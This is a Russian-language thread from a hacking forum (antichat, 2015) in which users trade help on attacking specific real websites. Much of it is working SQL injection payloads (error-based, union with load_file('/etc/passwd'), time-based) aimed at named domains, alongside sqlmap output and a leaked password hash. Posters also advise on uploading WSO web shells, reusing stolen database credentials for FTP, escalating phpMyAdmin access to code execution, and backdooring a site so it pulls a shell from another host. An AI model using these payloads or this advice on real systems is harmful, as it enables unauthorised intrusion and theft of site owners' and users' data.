'and extractvalue(null,concat(0x3a,(select concat(mid(КОЛОНКА,1,64)) from ТАБЛИЦА limit 0,1)))='
то
You can't specify target table 'ТАБЛИЦА' for update in FROM clause
cheebeez
02.10.2015, 00:48
[DEL 39]
ButilkaSoka
02.10.2015, 00:57
cheebeez said:
↑ (https://antichat.live/posts/3897583/)
Говорит, что нельзя делать одновременно апдэйт и селект к одной колонке.
Опечатался,
You can't specify target table 'ТАБЛИЦА' for update in FROM clause
SaNDER said:
↑ (https://antichat.live/posts/3897781/)
тебе уже ответили .
------------------------------------------------------------
Мой вопрос .
Где находится админка по адреcсу good-steam.ru ?
P.S просто у меня вот это есть
Code:
Полюбому к админке .
это настройки для подключения к бд
SaNDER said:
↑ (https://antichat.live/posts/3897810/)
И что мне это не как не пригодится? .
ищи интерфейс для подключения к БД (PMA, Adminer, etc), или попробуй подключиться удаленно. так же пробуй эти данные к другим сервисам, например FTP (бывает что совпадают)
cheebeez
03.10.2015, 01:42
[DEL 52]
Sharingan
04.10.2015, 18:30
Здравствуйте, имеется компьютер на windows xp (другой есть на windows server 2012), на нем есть RDP, netBios. Получить в NetBios список ресурсов получилось лишь пользовательский, хотя xSpider смог получить все:
сборник - пользовательский
IPC$ (Удаленный IPC) - pipe по умолчанию
D$ (Стандартный общий ресурс) - диск по умолчанию
ADMIN$ (Удаленный Admin) - диск по умолчанию
C$ (Стандартный общий ресурс) - диск по умолчанию
Подключается лишь к сборнику. Остальное - не получается null login не работает.
Получил список пользователей, я так понял netBios имена, это пользователи windows, вопрос, теперь только брутом RDP брать? Нет ли каких уязвимостей? Поиском особо ничего не нашел. По данной теме. Может еще есть советы по netBios
SaNDER said:
↑ (https://antichat.live/posts/3898652/)
Не проще ли заинжектить прогой,хэвидж всё вывел .
Code:
Target: http://www.fimca.com.br/pagina.asp?id=-11%20union%20select%201,2,3,concat_ws%280x3a,table _name,column_name%29,5,6%20from%20information_sche ma.columns
Host IP: 191.252.45.189
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL
Resp. Time(avg): 7342 ms
Current User: fimca@191.252.45.189
Sql Version: 5.1.54-rel12.6-log
Current DB: fimca
System User: fimca@191.252.45.189
Host Name: hm7092
Installation dir: /usr/
DB User: 'fimca'@'%'
Data Bases: information_schema
fimca
Админка в /admin,но без нужных прав не пустят(403 Forbbiden) .
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
UPD. Закрыто, ниже frank ответил.
AlexG said:
↑ (https://antichat.live/posts/3898725/)
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
http://raz0r.name/obzory/group_concat/
kingbeef
05.10.2015, 11:48
AlexG said:
↑ (https://antichat.live/posts/3898725/)
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
UPD. Закрыто, ниже frank ответил.
/threads/425320/ (https://antichat.live/threads/425320/)
Полный список всех методов обхода сейчас приведен здесь: https://rdot.org/forum/showthread.php?t=2860 (5: group_concat, benchmark, @, insert, replace).
Наиболее удобный в стандартной ситуации способ - 3.
http://mariin.ru/index.php?q=12'
www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/user()),+1,+63),+FLOOR(RAND(0)*2)))/* (http://www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/user()),+1,+63),+FLOOR(RAND(0)*2)))/*)
Нужно узнать префикс таблиц, чтоб вытащить админов. cms дырявая, но 4 версия mysql всему мешает. Рес оч нужный, прошу помоч)
PROCEDURE ANALYSE() заиспользовать не получилось, мб не правильно делаю
Shubka75
07.10.2015, 02:30
vikler said:
↑ (https://antichat.live/posts/3899404/)
Code:
http://mmp.nl/openfoto.asp?foto=453096142 AND 1=1&Weergave=Liggend&tabel=sportbeelden
Не могу вытащить ничего sqlmap'ом - Oracle вроде как но
[ERROR] unable to retrieve the number of databases
Там не Oracle, а Microsoft Access.
Valer4ik
07.10.2015, 13:46
Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,
справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,
если запрос повторить, вылазит ошибка.
MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'
query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')
POST /apatity/business-internet/ HTTP/1.1
Host: karelia.pro
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://karelia.pro/apatity/business-internet/
Cookie: __utma=86736642.1434525950.1444154760.1444207012.1 444209648.5; __utmz=86736642.1444154760.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); PHPSESSID=bc74f0fe64381cab78e74ac0e4d67963; __utmb=86736642.2.10.1444209648; __utmc=86736642; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
name=%C8%ED%ED%E0&city=%C0%EF%E0%F2%E8%F2%FB&street=%CC%FB%EB%EA%E0&house=65&FIO=%C3%F0%F3%F8%E5%E2%F1%EA%E0%FF&phone=3336324&info=&send=%A0
не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только
false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.
Можно это как то раскрутить?
BabaDook
07.10.2015, 16:14
Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции"
и по реализации. какие отличия, минусы, плюсы. Спасибо.
BabaDook said:
↑ (https://antichat.live/posts/3899615/)
Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции"
и по реализации. какие отличия, минусы, плюсы. Спасибо.
http://kaoticcreations.blogspot.com/2013/10/battling-windows-mysql-from-root-to.html
http://kaoticcreations.blogspot.com/2013/10/battling-windows-mysql-from-root-to_19.html
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -
Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))
для работы с другими базами (как перебрать имена всех баз)?
AlexG said:
↑ (https://antichat.live/posts/3900274/)
для работы с другими базами (как перебрать имена всех баз)?
select table_schema from information_schema.tables limit 1,1
kingbeef
09.10.2015, 09:54
AlexG said:
↑ (https://antichat.live/posts/3900274/)
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -
Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))
для работы с другими базами (как перебрать имена всех баз)?
select schema_name from information_schema.schemata limit 0,1
нашел blind sql, но при проверки привилегий показывает USAGE, можно только дамп или есть еще варианты?
AlexG said:
↑ (https://antichat.live/posts/3900274/)
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -
Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))
для работы с другими базами (как перебрать имена всех баз)?
Вектор объединения значений для extractvalue:
https://rdot.org/forum/showthread.php?t=2860
Code:
extractvalue(1, concat(0x3A, mid((X), Y, 31)))
X = SELECT convert(max(binary reverse(insert(0x3A, 1, 0, reverse(concat(schema_name, 0x0A))))), char(1000000)) FROM information_schema.schemata
Где Y = 1 + I * 31, i = 0, 1, ...
Но советую вам взять запрос из той темы, через него вы сразу получите и имена всех баз, и имена всех таблиц, и имена всех колонок.
Valer4ik said:
↑ (https://antichat.live/posts/3899568/)
Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,
справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,
если запрос повторить, вылазит ошибка.
MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'
query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')
...
не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только
false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.
Можно это как то раскрутить?
Скули нет. Второй столбец в таблице business_logs является первичным ключем. Он обязан содержать уникальное значение. Так как туда заносятся текущая дата и время, этого не происходит. Вы же выполняете более чем 1 запрос в секунду? Интересно, как сайт вообще работал.
Code:
http://watercorpimagelibrary.com.au
Какой шелл сюда лить? В админке заливка изображений
vikler said:
↑ (https://antichat.live/posts/3900500/)
Какой шелл сюда лить?
а есть варианты? лей wso
qaz said:
↑ (https://antichat.live/posts/3900519/)
а есть варианты? лей wso
варианты есть. если там java, то на wso2.php ему будет плевать.
vikler said:
↑ (https://antichat.live/posts/3900500/)
Code:
http://watercorpimagelibrary.com.au
Какой шелл сюда лить? В админке заливка изображений
нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.
yarbabin said:
↑ (https://antichat.live/posts/3900548/)
варианты есть. если там java, то на wso2.php ему будет плевать.
нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.
на оваспе - это где?
BabaDook
10.10.2015, 03:51
XAMEHA said:
↑ (https://antichat.live/posts/3897143/)
Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор:
Code:
PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))
https://rdot.org/forum/showthread.php?t=60&page=3
Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20'
Смело считайте, что там ничего нет. Эти
инъекции
стабильно появляются у нас в теме раз в неделю.
То есть
PHP:
SELECT*FROM ru_video WHERE dateQ №1064:You have an error in your SQL syntax;check the manual that corresponds to your MySQL serve r versionforthe right syntax tousenear'-20,20'at line 1
можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит
BabaDook said:
↑ (https://antichat.live/posts/3900654/)
То есть
PHP:
SELECT*FROM ru_video WHERE dateQ №1064:You have an error in your SQL syntax;check the manual that corresponds to your MySQL serve r versionforthe right syntax tousenear'-20,20'at line 1
можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит
пару страниц назад XAMEHA писал по этому поводу. ничего не получится
BabaDook
10.10.2015, 19:29
yarbabin said:
↑ (https://antichat.live/posts/3900702/)
пару страниц назад XAMEHA писал по этому поводу. ничего не получится
Спасибо, так и думал
ButilkaSoka
10.10.2015, 23:47
хелп.
сканер нашёл blind sql. Что делать с url такого типа?
если менять значения sleep, то ответ изменяется в соответствии со значениями. sleep(6)=6 сек.
Code:
_ttp://megakeys.ru/news/if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
куда копать в таком случае?
kacergei
11.10.2015, 08:59
Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел
Как узнать путь?
Доп. Информация: http://pastebin.com/ppPSZ4FH
P.S>Ошибок не выводит на сайте
kacergei said:
↑ (https://antichat.live/posts/3901018/)
Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел
Как узнать путь?
Доп. Информация:
http://pastebin.com/ppPSZ4FH
P.S>Ошибок не выводит на сайте
конфиги веб сервера
kacergei
11.10.2015, 15:01
yarbabin said:
↑ (https://antichat.live/posts/3901087/)
конфиги веб сервера
Перепробывал различные пути (почти все) с прикрепленной темы тут на форуме (Default *log, *conf files locations (https://antichat.live/threads/324564/)), так же на rdot'e смотрел, а может быть такое что с локалки тянуться файлы?
WallHack
11.10.2015, 18:18
Кручу error-based руками
Такой запрос возвращает данные из колонки username
Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
Можно вывести сразу id, username ?
Code:
http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Code:
Parameter: srrazdel (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE
WallHack said:
↑ (https://antichat.live/posts/3901237/)
Кручу error-based руками
Такой запрос возвращает данные из колонки username
Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
Можно вывести сразу id, username ?
select id,0x3a,username from users limit 0,1
WallHack
11.10.2015, 19:33
MaxFast said:
↑ (https://antichat.live/posts/3901252/)
select id,0x3a,username from users limit 0,1
Выводит: Operand should contain 1 column(s)
Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
WallHack said:
↑ (https://antichat.live/posts/3901266/)
Выводит: Operand should contain 1 column(s)
Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
объедините в concat
Waki said:
↑ (https://antichat.live/posts/3901248/)
Code:
http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Code:
Parameter: srrazdel (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE
зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php
Br@!ns said:
↑ (https://antichat.live/posts/3901288/)
зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php
спасибо, могу узнать о ваших методах? довольно быстро получили собрали необходимую информацию.
Waki said:
↑ (https://antichat.live/posts/3901320/)
спасибо, могу узнать о ваших методах? довольно быстро получили собрали необходимую информацию.
все стандартно, методом перебора интересных названий таблиц. Только скулю другую нашел, с выводом
в папке etc есть файлы
13107206.passwd
13240132.passwd
diraccess
система Linux sh3.ispcluster.com 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u3 x86_64
В файле есть ссылка перейдя по ней просит ввести логин и пасс через яваскрипт в файле 13107206.passwd вот такая инфа
384:$1$wN4OprQ0$OASVwu4Qs6Wc5YNQPRv/q.
как я понял первое пользователь второе пароль в хеше, я правельно понял?
И как расшифровать этот хеш или подменить!
xivi00 said:
↑ (https://antichat.live/posts/3901514/)
в папке etc есть файлы
13107206.passwd
13240132.passwd
diraccess
система Linux sh3.ispcluster.com 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u3 x86_64
В файле есть ссылка перейдя по ней просит ввести логин и пасс через яваскрипт в файле 13107206.passwd вот такая инфа
384:$1$wN4OprQ0$OASVwu4Qs6Wc5YNQPRv/q.
как я понял первое пользователь второе пароль в хеше, я правельно понял?
И как расшифровать этот хеш или подменить!
это md5(Unix). cmd5.ru
Очень печально но его там нет( можете помочь расшифровать?
winstrool
12.10.2015, 13:21
xivi00 said:
↑ (https://antichat.live/posts/3901533/)
Очень печально но его там нет( можете помочь расшифровать?
/forums/76/ (https://antichat.live/forums/76/) здесь тебе возможно помогут!
так если можете изменять файл, подмените пароль или вовсе удалите.
Есть форма редактирование шаблона из админ панели, когда я вставляю допусти код "" он его коверкает и получается ошибка, "Parse error: syntax error, unexpected '[', expecting ')' in /index.php on line 1" и при следующем редактировании шаблона он отображается уже как ""
Как можно обойти? Возможно данный вопрос уже решался, но найти почему-то не смог. Спасибо заранее всем ответившим.
Добавлю, код исполняется нормально
sysjuk said:
↑ (https://antichat.live/posts/3901706/)
Есть форма редактирование шаблона из админ панели, когда я вставляю допусти код "" он его коверкает и получается ошибка, "Parse error: syntax error, unexpected '[', expecting ')' in /index.php on line 1" и при следующем редактировании шаблона он отображается уже как ""
Как можно обойти? Возможно данный вопрос уже решался, но найти почему-то не смог. Спасибо заранее всем ответившим.
Добавлю, код исполняется нормально
Возможно сервер блокирует system используй другие. либо в ЛС отпиши, В общем решаемо.
Sharingan
13.10.2015, 17:37
Кто знает есть подробности об этой уязвимости. Есть ли эксплойты? по интернету ничего не нашел, уязвимость вроде критическая.
nginx SPDY heap buffer overflow
Описание:
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the ngx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file
есть phpMyAdmin 2.11.11.3 Documentation, не получаеться взломать phpmyadmin, уже перепробовал все что есть в сети
кто может помочь?
dexspace
14.10.2015, 18:55
http://www.veles.km.ua/'"
выдаёт
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1
query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1;
сайт уязвим, но havij не может выдрать имя базы.
сейчас сканю sqlmap
есть идеи?
dexspace said:
↑ (https://antichat.live/posts/3902596/)
http://www.veles.km.ua/
'"
выдаёт
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1
query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1;
сайт уязвим, но havij не может выдрать имя базы.
сейчас сканю sqlmap
есть идеи?
Руки рулят
Code:
http://www.veles.km.ua/' and (select 1 from (Select count(*),Concat((select version()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) --+
Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres
Вопрос:
1 - Есть ли возможность - создать из phpmyadmin SMTP сервер
2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/
Спасибо.
Kirza said:
↑ (https://antichat.live/posts/3903089/)
Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres
Вопрос:
1 - Есть ли возможность - создать из phpmyadmin SMTP сервер
2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/
Спасибо.
1. Если file_priv, то можно постепенно поднимать права до RCE, а там уже делать, что хочется.
2. Только путем чтения конфигов (https://rdot.org/forum/showthread.php?t=741) или вариант выше
Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
-0x00- said:
↑ (https://antichat.live/posts/3903102/)
Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
http://php.net/manual/ru/function.file-put-contents.php
winstrool
16.10.2015, 00:51
-0x00- said:
↑ (https://antichat.live/posts/3903102/)
Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
Вы наверное про эту тему? /threads/307894/ (https://antichat.live/threads/307894/) - Не стандартные способы заливки шеллов
Есть доступ к mongodb вроде 2.4 , возможно как-то получить доступ к файлам сайта или залить шел ?
Подключаюсь через Robomongo
Доброго времени суток
Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития
на примере уязвимости:
Code:
http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--
каким образом можно раскрыть абсолютный путь сайта ?
к примеру все файлы из etc читаются.
а как перейти к файлу httpd.conf
или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?
большое спасибо
aldemko said:
↑ (https://antichat.live/posts/3903247/)
Доброго времени суток
Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития
на примере уязвимости:
Code:
http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--
каким образом можно раскрыть абсолютный путь сайта ?
к примеру все файлы из etc читаются.
а как перейти к файлу httpd.conf
или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?
большое спасибо
http://wiki.apache.org/httpd/DistrosDefaultLayout Изучи данный материал в помощь.
Так же там mysql root узнать пути с ссылкой выше не проблема, и залиться тоже.
RedFern.89 said:
↑ (https://antichat.live/posts/3903294/)
Code:
http://prodota.ru/news/
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd1514435274 42; session_id=1;
уязвим параметр session_id, дальше базы дело не идет? инъекция time based, поможет кто?
Что значит дальше базы дело не идёт? легко крутится через error based
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd1514435274 42; session_id=1'or(select*from(select(name_const(vers ion(),1)),name_const(version(),1))a)and(1)='1
Code:
Ошибка базы данных. MySQL пишет:Duplicate column name '5.6.25-73.1-log'
OxoTnik said:
↑ (https://antichat.live/posts/390/)
http://wiki.apache.org/httpd/DistrosDefaultLayout
Изучи данный материал в помощь.
Так же там mysql root узнать пути с ссылкой выше не проблема, и залиться тоже.
спасибо
извини что беспокою
перепробовал все команды которые в том списке - точнее пути
прописывал
полный путь мне так и не вывело
root я уже получил через sqlmap и папки имеющие права записи тоже нашел.
осталось путь указать в sqlmap куда залиться, а пути у меня нет
пожалуйста подскажи не конкретный путь а что именно может в моем примере вывести абсолютный путь
спасибо
PS Там ось Gentoo
просто через sqlmap
я не могу скачать файл
/etc/apache2/httpd.conf
он пустой скачивается - то есть с ошибкой про размер
при этом права на чтение есть.
а через браузер %20union%20select%201,load_file(%27/etc/apache2/httpd.conf%27),3,4--
открывает - но не видно там пути к папке сайта (
и правильно ли я понял, что люди обладающие знаниями, могли бы залить бекдор + шелл только из этой строки ? без sqlmap и прочего ? - это так для себя что бы понимать уровень
а так я хотел бы для начала с простых примеров - нет я назодил ресурсы где было все просто, но там было просто по методичке грубо говоря, здесь все получил а путь не могу получить (
помогите плс
aldemko said:
↑ (https://antichat.live/posts/3903365/)
спасибо
извини что беспокою
перепробовал все команды которые в том списке - точнее пути
прописывал
полный путь мне так и не вывело
root я уже получил через sqlmap и папки имеющие права записи тоже нашел.
осталось путь указать в sqlmap куда залиться, а пути у меня нет
пожалуйста подскажи не конкретный путь а что именно может в моем примере вывести абсолютный путь
спасибо
PS Там ось
Gentoo
просто через sqlmap
я не могу скачать файл
/etc/apache2/httpd.conf
он пустой скачивается - то есть с ошибкой про размер
при этом права на чтение есть.
а через браузер %20union%20select%201,load_file(%27/etc/apache2/httpd.conf%27),3,4--
открывает - но не видно там пути к папке сайта (
и правильно ли я понял, что люди обладающие знаниями, могли бы залить бекдор + шелл только из этой строки ? без sqlmap и прочего ? - это так для себя что бы понимать уровень
а так я хотел бы для начала с простых примеров - нет я назодил ресурсы где было все просто, но там было просто по методичке грубо говоря, здесь все получил а путь не могу получить (
помогите плс
все верно 1 запрос и там шел.
BabaDook
16.10.2015, 19:36
OxoTnik said:
↑ (https://antichat.live/posts/3903404/)
все верно 1 запрос и там шел.
а не всегда, если нету папок на запись то никак.
после root@localhost я бы пытался бы залить мини шел
aldemko said:
↑ (https://antichat.live/posts/3903365/)
спасибо
извини что беспокою
перепробовал все команды которые в том списке - точнее пути
прописывал
полный путь мне так и не вывело
root я уже получил через sqlmap и папки имеющие права записи тоже нашел.
осталось путь указать в sqlmap куда залиться, а пути у меня нет
пожалуйста подскажи не конкретный путь а что именно может в моем примере вывести абсолютный путь
спасибо
я бы в первую очередь поискал phpmyadmin и phpinfo .....
phpmyadmin есть
root есть
папки для записи есть
нужен абсолютный путь сайта
OxoTnik (https://antichat.live/members/165241/) порекомендовал просмотреть сайт http://wiki.apache.org/httpd/DistrosDefaultLayout
я пробовал подставить все пути для Gentoo списывал
отображает данные, но абсолютного пути я там не нашел
web server operating system: Linux Gentoo
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL 5.0.12
OxoTnik подскажи что мне нужно написать в скобках что бы путь появился если не сложно
а не всегда, если нету папок на запись то никак.
после root@localhost я бы пытался бы залить мини шел
BabaDook said:
↑ (https://antichat.live/posts/3903405/)
а не всегда, если нету папок на запись то никак.
после root@localhost я бы пытался бы залить мини шел
так мне бы абсолютный путь знать ((
я никак не могу его вычислить
как я понимаю
(%27//etc/apache2/httpd.conf%27),3,4--
должен вывести путь
но там просто стандартный закоментированный файл (
BabaDook
16.10.2015, 20:21
Я не профи
http://www.direct-line.ru/images/Thumbs.db
http://www.direct-line.ru/images/karta-big.old
может это что-то даст
BabaDook said:
↑ (https://antichat.live/posts/3903430/)
Я не профи
http://www.direct-line.ru/images/Thumbs.db
http://www.direct-line.ru/images/karta-big.old
может это что-то даст
ты меня совсем озадачил
скачал файлы эти, не открываются, под Thumbs.db (http://www.direct-line.ru/images/Thumbs.db) скачал
Thumbnail Database Viewer
показывает список картинок
я наверное баран, но я пути не вижу (*
скажи ты там что-то видишь ? не говори как, просто если там есть информация, я буду искать как ее извлечь с таких файлов.
спасибо
BabaDook
16.10.2015, 23:13
http://www.direct-line.ru/phpmyadmin/
http://www.direct-line.ru/old_site/
http://www.direct-line.ru/server-info -403, можно сделать попытку обойти
Спасибо но это я уже находил
мне бы разобраться с той ссылкой что ты дал
я пробовал подставлять разные значения подходящие под Gento но я так и не смог отобразить на сайте абсолютный путь ресурса (
aldemko said:
↑ (https://antichat.live/posts/3903557/)
Спасибо но это я уже находил
мне бы разобраться с той ссылкой что ты дал
